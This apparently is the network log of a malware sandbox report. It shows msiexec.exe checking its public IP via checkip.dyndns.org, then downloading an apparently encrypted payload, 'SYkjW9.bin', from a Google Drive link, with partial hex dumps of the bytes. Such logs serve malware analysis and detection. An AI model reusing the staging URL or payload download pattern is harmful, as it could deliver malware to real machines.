                                                                                                                          Pragma: no-cache
                                                                                                                          X-Request-ID: 25bc62aeeff2d5c7e97c17d386c99ee8
                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.76</body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          15192.168.2.650022193.122.6.168803212C:\Windows\SysWOW64\msiexec.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 22, 2024 16:12:16.793247938 CEST151OUTGET / HTTP/1.1
                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                          Host: checkip.dyndns.org
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Oct 22, 2024 16:12:17.629726887 CEST323INHTTP/1.1 200 OK
                                                                                                                          Date: Tue, 22 Oct 2024 14:12:17 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Content-Length: 106
                                                                                                                          Connection: keep-alive
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Pragma: no-cache
                                                                                                                          X-Request-ID: 5d1e89c9fa98e182fa247fe9dd081283
                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.76</body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          0192.168.2.649987142.250.184.2384434460C:\Windows\SysWOW64\msiexec.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-22 14:11:53 UTC216OUTGET /uc?export=download&id=1rPNxWKL8K9PUiAx5BBXPJ-bVegWrIRWE HTTP/1.1
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                          Host: drive.google.com
                                                                                                                          Cache-Control: no-cache
                                                                                                                          2024-10-22 14:11:53 UTC1610INHTTP/1.1 303 See Other
                                                                                                                          Content-Type: application/binary
                                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                          Pragma: no-cache
                                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                          Date: Tue, 22 Oct 2024 14:11:53 GMT
                                                                                                                          Location: https://drive.usercontent.google.com/download?id=1rPNxWKL8K9PUiAx5BBXPJ-bVegWrIRWE&export=download
                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                          Content-Security-Policy: script-src 'nonce-CrCsR-vUT2oS4VqfoTCeyA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                                                          Server: ESF
                                                                                                                          Content-Length: 0
                                                                                                                          X-XSS-Protection: 0
                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                          Connection: close


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          1192.168.2.649986142.250.184.2384433212C:\Windows\SysWOW64\msiexec.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-22 14:11:53 UTC216OUTGET /uc?export=download&id=1rPNxWKL8K9PUiAx5BBXPJ-bVegWrIRWE HTTP/1.1
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                          Host: drive.google.com
                                                                                                                          Cache-Control: no-cache
                                                                                                                          2024-10-22 14:11:53 UTC1610INHTTP/1.1 303 See Other
                                                                                                                          Content-Type: application/binary
                                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                          Pragma: no-cache
                                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                          Date: Tue, 22 Oct 2024 14:11:53 GMT
                                                                                                                          Location: https://drive.usercontent.google.com/download?id=1rPNxWKL8K9PUiAx5BBXPJ-bVegWrIRWE&export=download
                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                                                          Content-Security-Policy: script-src 'nonce-KombpatoenzcCRumVarSnw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                          Server: ESF
                                                                                                                          Content-Length: 0
                                                                                                                          X-XSS-Protection: 0
                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                          Connection: close


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          2192.168.2.649988142.250.185.654434460C:\Windows\SysWOW64\msiexec.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-22 14:11:54 UTC258OUTGET /download?id=1rPNxWKL8K9PUiAx5BBXPJ-bVegWrIRWE&export=download HTTP/1.1
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Host: drive.usercontent.google.com
                                                                                                                          Connection: Keep-Alive
                                                                                                                          2024-10-22 14:11:57 UTC4890INHTTP/1.1 200 OK
                                                                                                                          Content-Type: application/octet-stream
                                                                                                                          Content-Security-Policy: sandbox
                                                                                                                          Content-Security-Policy: default-src 'none'
                                                                                                                          Content-Security-Policy: frame-ancestors 'none'
                                                                                                                          X-Content-Security-Policy: sandbox
                                                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                                                          Cross-Origin-Embedder-Policy: require-corp
                                                                                                                          Cross-Origin-Resource-Policy: same-site
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Content-Disposition: attachment; filename="SYkjW9.bin"
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          Access-Control-Allow-Credentials: false
                                                                                                                          Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                                                          Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Content-Length: 279616
                                                                                                                          Last-Modified: Sun, 20 Oct 2024 23:54:48 GMT
                                                                                                                          X-GUploader-UploadID: AHmUCY3SYVRJV4kqZLRBJAvuzolncxsl_zKDys3Mq66iRV-fuSV6Ryp1RT2v6qZC1iq1yZCsF5g4CS8B2Q
                                                                                                                          Date: Tue, 22 Oct 2024 14:11:57 GMT
                                                                                                                          Expires: Tue, 22 Oct 2024 14:11:57 GMT
                                                                                                                          Cache-Control: private, max-age=0
                                                                                                                          X-Goog-Hash: crc32c=epXt+A==
                                                                                                                          Server: UploadServer
                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                          Connection: close
                                                                                                                          2024-10-22 14:11:57 UTC4890INData Raw: f4 73 a0 cc 56 d5 cf a6 de f9 b6 f7 73 b6 43 50 ef 5d dc 77 ad cc 5b 22 0c 97 cb 3d b6 89 cb af 20 10 6b 95 ad f2 f7 7f 20 0b ce 30 2c 23 c7 ff 81 1e 42 97 5f 49 fd 6a 07 b6 2c e6 88 d1 0c 67 cc dc 40 c6 50 bc 6b 23 3f d5 14 32 fa 7b 05 57 b0 2c f8 52 03 01 54 6b b3 e9 d7 99 f2 d0 6d 39 71 f3 63 04 aa b2 07 9e 1f 59 17 9e 86 b9 f4 ee 97 f3 1f 9a ea bf b1 2b 0a 57 07 cb 63 72 02 42 77 08 cc 09 ec 81 e5 34 10 9e ea 77 22 83 df ea f6 d3 e8 06 14 b6 9e 46 b6 0d 8c 89 ab f9 ae 4f a7 40 1c 7a 15 d3 bc bd 68 ef 1d dc cf 82 b7 79 3e 95 71 d3 00 d6 e1 35 6d 29 bf 56 f7 35 2b d0 7e 8b 20 70 b8 2a 20 27 a9 f2 0f e1 f6 95 41 79 d9 29 11 9a a5 50 72 3e a2 da 0e e0 e0 e6 56 9d c0 8d e0 26 17 83 29 cc 2b 7b a1 28 aa 82 39 3b 03 c2 22 b0 dc c3 8e fa f3 9d 5a e0 7c 88 4c
                                                                                                                          Data Ascii: sVsCP]w["= k 0,#B_Ij,g@Pk#?2{W,RTkm9qcY+WcrBw4w"FO@zhy>q5m)V5+~ p* 'Ay)Pr>V&)+{(9;"Z|L
                                                                                                                          2024-10-22 14:11:57 UTC4890INData Raw: 80 19 a0 83 8c 25 03 c7 5b ec d1 8b 98 39 8d 74 58 24 6c 1a 0d 90 6a b7 2d 42 19 2a 90 a3 83 f2 2b b0 64 b6 0c 66 1f 69 6c 99 05 ec a2 8a fd d6 89 1f 40 88 2d 9e 95 9c cf bc c2 40 86 81 b5 6f e4 90 fc d9 2d 5a d2 d5 45 b2 41 2e 42 37 d5 f2 b0 fc b9 a4 23 fc de a7 09 2b f2 7f 2d 15 3e 3c e7 bc 89 5a 6d 09 72 47 fb db a5 77 da 34 3e 91 28 c8 78 d4 43 24 ee 22 89 06 b3 f7 0d d5 ef c8 62 94 63 e1 b8 c4 8f c0 0c 50 63 3d 13 d3 bc 12 22 f4 f5 3f a8 fa 25 9a 32 4b e6 bd 0a cf c2 9d 0b 56 5d 8e 32 ba 09 09 91 91 bb 34 97 c5 2c 78 25 88 bd bc 79 85 ea 08 5c 7b 12 e0 71 f6 f6 3e 3b 92 99 79 e8 a7 44 63 75 2f 4f 06 3f 16 1c 38 60 af 79 c1 92 1e fd d9 bc 3f ae 1e a1 12 69 d1 e5 25 6e a4 4a 92 65 ac b1 5b 6d 9b 14 60 1e f6 00 cd 9d ea 5d 10 40 2e df 72 6d 3f 93 36 76
                                                                                                                          Data Ascii: %[9tX$lj-B*+dfil@-@o-ZEA.B7#+-><ZmrGw4>(xC$"bcPc="?%2KV]24,x%y\{q>;yDcu/O?8`y?i%nJe[m`]@.rm?6v
                                                                                                                          2024-10-22 14:11:57 UTC29INData Raw: 4f f3 0e bb 02 e4 94 24 e6 ec 05 b7 fa 70 47 93 56 5f b6 e8 4e 5c 7f 5d c5 64 40 2f f6
                                                                                                                          Data Ascii: O$pGV_N\]d@/
                                                                                                                          2024-10-22 14:11:57 UTC1322INData Raw: f8 62 99 7e d3 ad 1d e0 0b 05 a0 3a 00 83 01 7d d8 90 90 65 31 81 20 ed f7 de 77 80 ee ea 08 f4 c0 c7 3c 97 77 f9 c9 21 44 bf 3e 68 76 2a 0c 53 aa b0 96 00 53 53 a4 34 21 33 96 4e 3b bd 28 8e c8 d6 ee be 1e 09 19 2b d4 b2 d4 3d 87 4c 6c 36 7e 3e e1 a3 8c f4 27 e7 00 95 fd 19 e3 82 5d ba 5b 39 57 cd 78 0a 82 68 32 8f 97 5b 8b 7d 50 88 e3 e4 b4 4a 7b c4 61 e8 5b b4 43 8d 3d 16 86 fe 71 d4 55 7e 8b ee 6c 75 48 87 36 6d 96 7f 02 b1 5b ef 07 e1 b4 5b 5b f3 58 0f 6e 4b 6f 74 27 dd 71 b4 8f 70 42 07 bc 2c cb de 1a da 59 c4 bc b3 01 2c 02 0e c5 17 14 66 b2 ae 63 f5 67 7c cc 14 cf 91 db 54 49 45 5c 01 2c b4 e4 d7 83 5f ba f6 7d e5 f4 85 b3 77 e1 98 5a 09 e1 ce e6 26 db 40 a0 05 11 6c a7 ad 2f ea 76 c4 04 6b 5d 18 a2 c6 f9 6f 73 ca cd 7d 25 e2 d8 83 bc a5 eb e6 40
                                                                                                                          Data Ascii: b~:}e1 w<w!D>hv*SSS4!3N;(+=Ll6~>'][9Wxh2[}PJ{a[C=qU~luH6m[[[XnKot'qpB,Y,fcg|TIE\,_}wZ&@l/vk]os}%@
                                                                                                                          2024-10-22 14:11:57 UTC1378INData Raw: 68 fb f0 04 dd 82 20 8e 0a c9 b3 d5 2a 5d b0 72 cc e1 ce 00 2d 6c 2c 8e b8 8b 74 bc c2 3e 0d 90 44 b1 26 96 2c d1 a2 45 9c 98 6a b2 57 d2 e0 8f 47 6e 95 de e1 2e ed 57 60 27 5d 29 f4 13 3e eb 91 cb 1f e4 6e 1b 28 51 d3 57 6e fb 67 24 16 f7 e6 d3 c2 f9 30 62 07 1d a7 74 b3 cd e1 a7 a9 c8 14 50 11 f5 26 cc 02 e4 9e 5a d4 92 3a b3 88 23 54 b2 54 5b 8d 69 3e 22 6a 4b 3b 61 7b 60 e7 fe 51 4b 5e ad ed 63 cf 0f 2d 9a 48 31 87 01 d3 de 9d 39 51 31 8b 3c 00 d5 cd 58 f3 e9 d3 32 2b c0 c7 3c 83 f7 c8 f4 21 40 cb 1a aa 76 5a 10 53 ea b0 96 00 45 de 67 27 05 28 a1 6a 76 a8 db f4 c8 d6 eb e8 cb 7b 7d 2e bb 06 76 18 9a 64 c9 3e 11 f1 43 86 9e f8 64 e8 00 e1 30 fa fa fc 6f ba 4a 35 87 62 72 78 50 4f 86 ff 35 74 e2 a3 6a 88 93 c8 4d 6f 67 bc be 20 5b c4 eb a5 59 1e 9b 79
                                                                                                                          Data Ascii: h *]r-l,t>D&,EjWGn.W`'])>n(QWng$0btP&Z:#TT[i>"jK;a{`QK^c-H19Q1<X2+<!@vZSEg'(jv{}.vd>Cd0oJ5brxPO5tjMog [Yy
                                                                                                                          2024-10-22 14:11:57 UTC1378INData Raw: 4b 0d c9 5c 7b 00 3f bd 0c da ae 6c 0e 32 79 69 ee 0f d6 ae a6 ee 31 40 34 73 76 26 1a 00 53 53 76 c5 e0 d3 a6 45 12 61 fe 9e c5 7d 19 b1 83 e0 c4 3e 84 2f b1 2b 89 38 3c a2 39 3d ac 40 22 2c 3d 72 03 2c 63 cf 20 79 89 43 03 cb 9d 48 ab 11 bd 99 d5 3b 51 6c 69 d0 93 7a 27 e6 1c 8e ac a2 47 74 b6 a7 62 1c 98 30 98 07 8d a5 ef 99 45 9d b9 0f 7c b3 c0 ea 90 28 4b 82 fc 55 3f e5 4c c4 6d 8b 5b 8a 16 3e 8a 35 81 c9 9a 56 11 28 7d 15 72 74 8f 5c f9 06 a2 6c cf b7 f9 3a 7b 1e 3f 99 3e c5 cd eb 73 a9 e8 14 5c 6f c0 0e bb 06 96 c3 58 d4 9c 13 9b 09 27 45 99 30 b7 9f 7a 45 4d 7e 72 f0 64 53 29 99 d5 5b 5a 78 fb 46 63 cf 01 16 a8 36 07 81 01 09 bc 9a 00 65 41 9d 1e 92 f6 cd 7a 87 17 d2 2b f8 d1 ca 05 5a 89 ff f4 37 6c cf 4d a8 7c 2a 26 7b 67 b0 96 22 24 20 66 3e 21
                                                                                                                          Data Ascii: K\{?l2yi1@4sv&SSvEa}>/+8<9=@",=r,c yCH;Qliz'Gtb0E|(KU?Lm[>5V(}rt\l:{?>s\oX'E0zEM~rdS)[ZxFc6eAz+Z7lM|*&{g"$ f>!
                                                                                                                          2024-10-22 14:11:57 UTC1378INData Raw: 6c bd 8b 73 7c 4e c6 86 28 c5 23 c8 2c b4 c7 6a 45 d9 8f ee 30 df ed ec fb be 79 21 57 1b 1d e7 14 5b 44 3e 79 5b f1 b8 b3 b5 f8 95 3b 69 43 90 0a 64 82 53 dc 88 c1 19 93 0e a1 4a 37 57 cb 4d 9c 77 af fb a6 3b a7 4b 56 20 5c 7b 0c 43 03 1d dc cb cf 16 27 73 08 c1 3b 05 ae ac 9a 7a 3e 08 77 5e 68 69 c9 59 2d 63 d6 e8 a9 bf 0f 12 65 86 6b d3 69 7d 8f 11 61 c4 34 fa ba 4f 2a 9b 3d 2d a3 67 b1 ad 48 45 2c 4c 72 03 2c 63 c7 75 30 89 52 0f a3 b1 82 ab 15 c4 25 d5 2a 53 7d ea d0 93 74 0f 05 46 8e a6 c7 96 f9 f6 ad 62 0c b5 58 d0 0b 98 a1 e1 00 60 8a 95 c8 c0 b3 ca 42 da fd 39 fc f9 55 5e 4f 78 db 7c 7d 5b 8a 18 9c be 29 9c a4 95 56 6b 8a 70 6a 0c 68 89 5c 23 79 69 44 fb bd 5b 15 74 66 07 a5 5c b5 6f c9 d8 a9 e8 1e 33 4d f5 0e b1 0f ec 9d d4 bd 86 6a 0d 88 27 4f
                                                                                                                          Data Ascii: ls|N(#,jE0y!W[D>y[;iCdSJ7WMw;KV \{C's;z>w^hiY-ceki}a4O*=-gHE,Lr,cu0R%*S}tFbX`B9U^Ox|}[)Vkpjh\#yiD[tf\o3Mj'O
                                                                                                                          2024-10-22 14:11:57 UTC1378INData Raw: a4 44 13 eb 7b cb 14 f6 d4 c3 8c e1 34 96 48 3f d3 1d 7d 24 fc e7 76 f7 7c 1f 48 aa ca 22 67 d1 20 31 19 5a 65 79 a2 db d2 45 c1 37 12 5b 84 8b 8d d5 ec 21 31 89 9d ba a2 7c f2 5a f8 c1 a7 a6 53 08 ec fd 01 63 b6 39 bc dd b7 7c 4e c8 32 f3 de 5b 12 04 16 b0 42 05 a7 bc e8 92 fe 86 c5 bf be 09 33 dd bf 07 95 16 5f ba 4f d0 79 d3 87 3f f5 f8 81 ea 19 55 e2 81 5c af 23 7e a7 a4 73 37 0e d1 57 18 71 d3 3f 1f 47 b9 f5 40 1e be 67 ca 24 5c 71 a8 09 a0 6f b8 d3 bd 7e 90 5b 0d e9 60 0f 0c 8e 91 31 3e 02 60 68 50 a3 dc 53 23 02 c9 e8 ad 93 6d 5b 65 8c c3 b5 c5 7b a7 db 49 86 3e 8e 3f 5e 34 8b 25 05 ef 15 31 bb 48 e8 c2 f6 72 03 03 4b fb 0b 72 83 41 14 dd da e0 ab 11 bd 47 d5 2a 59 12 57 ae a7 7e 0f 29 6e d9 a4 cd fb 62 9e 2c 62 0d 9a 58 5c 06 9e 81 80 82 7c 4e bd
                                                                                                                          Data Ascii: D{4H?}$v|H"g 1ZeyE7[!1|ZSc9|N2[B3_Oy?U\#~s7Wq?G@g$\qo~[`1>`hPS#m[e{I>?^4%1HrKrAG*YW~)nb,bX\|N
                                                                                                                          2024-10-22 14:11:57 UTC1378INData Raw: 5c 32 e0 32 b3 6c a3 96 8e a1 b9 16 c9 2c 70 66 ea b4 d3 72 85 ed 05 33 c1 cc f3 5e d9 ad 59 3b 98 80 12 80 8f 26 69 79 25 e1 0c 39 16 16 2b 64 af 16 f7 9a 09 8a c1 eb 3d a4 7d b2 3a f9 d4 96 44 78 5a 41 92 66 ac b2 60 c8 f5 14 60 6a d9 de c3 99 89 6a 3e 48 4f cf 35 ed 3f 93 36 60 09 77 0c 4e 83 0f 1b 57 d0 20 31 0f 66 ed 7f 9f d1 d2 63 b2 fb 12 5b a6 d4 4c d5 e6 2b 2d 77 1f ba a2 77 c4 4b 9b 7b d2 9c 23 20 a9 8e c2 65 14 16 c4 67 f2 7c 44 cc 81 d1 a9 ec ce 15 1c be 57 45 a7 b8 81 f6 db 9f b1 f9 af 0e 45 f5 8a 1d 97 36 f9 ba 3f 78 2e 68 8c b2 c5 d0 da eb 3c 49 ff cc 4c af 59 dc 93 b4 46 0e 4e d1 5d bb 71 dd 3f b1 44 b9 f5 40 1e b0 67 ca 24 5c 71 a8 09 a2 6f a2 ce bd 7e 90 56 61 97 58 05 ae a2 46 14 24 7a 48 75 22 19 6b 76 48 02 f6 e8 ad 93 e7 37 79 fe f1
                                                                                                                          Data Ascii: \22l,pfr3^Y;&iy%9+d=}:DxZAf``jj>HO5?6`wNW 1fc[L+-wwK{# eg|DWEE6?x.h<ILYFN]q?D@g$\qo~VaXF$zHu"kvH7y
                                                                                                                          2024-10-22 14:11:57 UTC1378INData Raw: 5d 7f 2d 1f 54 18 ff ce f9 55 6d 79 d0 62 e2 a5 9d 77 da 30 9d b4 32 ba 94 d6 43 54 94 06 92 78 83 f7 0d d1 08 ed 7e e7 40 c7 bb b4 9c e8 79 50 70 37 7c 9e bc 12 00 84 d7 24 2f b1 22 b2 69 6e f0 c5 43 b7 9e ed a9 79 25 c2 86 ba 03 03 34 ab b3 cb b6 ca 2c 09 e8 c8 a4 c2 4b 85 ed 0b 91 38 08 92 40 f2 99 29 99 ba e6 16 80 ad 57 4a 6f 07 4a 6f 3f 1c 16 0b 64 a3 68 c5 b2 7e 8e b3 b6 3f a4 73 9b 12 78 d0 87 6c 1c ce 57 81 13 c3 a8 59 02 f3 3c 29 14 f6 d4 d2 be 85 1b 3c 48 3b f1 23 6c 3f 95 3c a8 e7 53 37 7c 92 09 28 74 f5 20 19 6d 72 13 73 7c d1 d2 65 c1 45 25 5b ac f8 ff 82 e4 21 5d 12 f5 3b a2 7d dd 5a 74 7d bf 83 32 05 81 a1 1c e8 54 1c ab a2 d7 6a 3c e0 86 d6 b6 8b eb 02 3e 74 6a 45 ad 1e cb 28 a9 e1 b4 f9 ce ab 12 66 e4 25 e7 1e 49 18 1a 68 2e f3 9f b2 c5
                                                                                                                          Data Ascii: ]-TUmybw02CTx~@yPp7|$/"inCy%4,K8@)WJoJo?dh~?sxlWY<)<H;#l?<S7|(t mrs|eE%[!];}Zt}2Tj<>tjE(f%Ih.


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          3192.168.2.649989142.250.185.654433212C:\Windows\SysWOW64\msiexec.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-22 14:11:54 UTC258OUTGET /download?id=1rPNxWKL8K9PUiAx5BBXPJ-bVegWrIRWE&export=download HTTP/1.1
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Host: drive.usercontent.google.com
                                                                                                                          Connection: Keep-Alive
                                                                                                                          2024-10-22 14:11:59 UTC4890INHTTP/1.1 200 OK
                                                                                                                          Content-Type: application/octet-stream
                                                                                                                          Content-Security-Policy: sandbox
                                                                                                                          Content-Security-Policy: default-src 'none'
                                                                                                                          Content-Security-Policy: frame-ancestors 'none'
                                                                                                                          X-Content-Security-Policy: sandbox
                                                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                                                          Cross-Origin-Embedder-Policy: require-corp
                                                                                                                          Cross-Origin-Resource-Policy: same-site
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Content-Disposition: attachment; filename="SYkjW9.bin"
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          Access-Control-Allow-Credentials: false
                                                                                                                          Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                                                          Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Content-Length: 279616
                                                                                                                          Last-Modified: Sun, 20 Oct 2024 23:54:48 GMT
                                                                                                                          X-GUploader-UploadID: AHmUCY3hAvVHC8g6t9F1rgBz07yA8fP7bx1CKKPP1ExAr4kX-Mxqr3GtEDagf_YVfLF3Ri7cPu4tXb5H4g
                                                                                                                          Date: Tue, 22 Oct 2024 14:11:59 GMT
                                                                                                                          Expires: Tue, 22 Oct 2024 14:11:59 GMT
                                                                                                                          Cache-Control: private, max-age=0
                                                                                                                          X-Goog-Hash: crc32c=epXt+A==
                                                                                                                          Server: UploadServer
                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                          Connection: close
                                                                                                                          2024-10-22 14:11:59 UTC4890INData Raw: f4 73 a0 cc 56 d5 cf a6 de f9 b6 f7 73 b6 43 50 ef 5d dc 77 ad cc 5b 22 0c 97 cb 3d b6 89 cb af 20 10 6b 95 ad f2 f7 7f 20 0b ce 30 2c 23 c7 ff 81 1e 42 97 5f 49 fd 6a 07 b6 2c e6 88 d1 0c 67 cc dc 40 c6 50 bc 6b 23 3f d5 14 32 fa 7b 05 57 b0 2c f8 52 03 01 54 6b b3 e9 d7 99 f2 d0 6d 39 71 f3 63 04 aa b2 07 9e 1f 59 17 9e 86 b9 f4 ee 97 f3 1f 9a ea bf b1 2b 0a 57 07 cb 63 72 02 42 77 08 cc 09 ec 81 e5 34 10 9e ea 77 22 83 df ea f6 d3 e8 06 14 b6 9e 46 b6 0d 8c 89 ab f9 ae 4f a7 40 1c 7a 15 d3 bc bd 68 ef 1d dc cf 82 b7 79 3e 95 71 d3 00 d6 e1 35 6d 29 bf 56 f7 35 2b d0 7e 8b 20 70 b8 2a 20 27 a9 f2 0f e1 f6 95 41 79 d9 29 11 9a a5 50 72 3e a2 da 0e e0 e0 e6 56 9d c0 8d e0 26 17 83 29 cc 2b 7b a1 28 aa 82 39 3b 03 c2 22 b0 dc c3 8e fa f3 9d 5a e0 7c 88 4c
